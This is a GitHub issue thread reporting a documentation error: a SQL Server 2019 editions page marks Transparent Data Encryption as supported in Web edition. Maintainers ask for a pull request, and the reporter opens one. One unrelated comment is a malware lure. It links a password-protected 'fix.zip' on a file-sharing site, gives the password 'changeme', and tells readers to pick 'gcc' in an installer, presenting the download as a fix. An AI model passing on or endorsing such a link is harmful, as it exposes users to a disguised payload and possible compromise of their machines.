### ISSUE TITLE
Transparent data encryption (TDE) incorrectly marked as supported by SQL Server Web edition

### ISSUE THREAD

**Issue by EitanBlumin** [MicrosoftDocs/feedback#4017]
In the following page:
https://learn.microsoft.com/en-us/sql/sql-server/editions-and-components-of-sql-server-2019

"Transparent data encryption (TDE)" is incorrectly marked as supported ("Yes") by SQL Server **Web** edition.

However, TDE is only supported by Enterprise and Standard editions.

Code line: https://github.com/MicrosoftDocs/sql-docs/blob/live/docs/sql-server/editions-and-components-of-sql-server-2019.md?plain=1#L224

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gewarren** [comment]
cc @rwestMSFT

**Comment by rwestMSFT** [comment]
@EitanBlumin Please open a pull request against the `sql-docs` repository for that article. Thanks.

#please-close

**Comment by EitanBlumin** [comment]
PR created: https://github.com/MicrosoftDocs/sql-docs/pull/9888
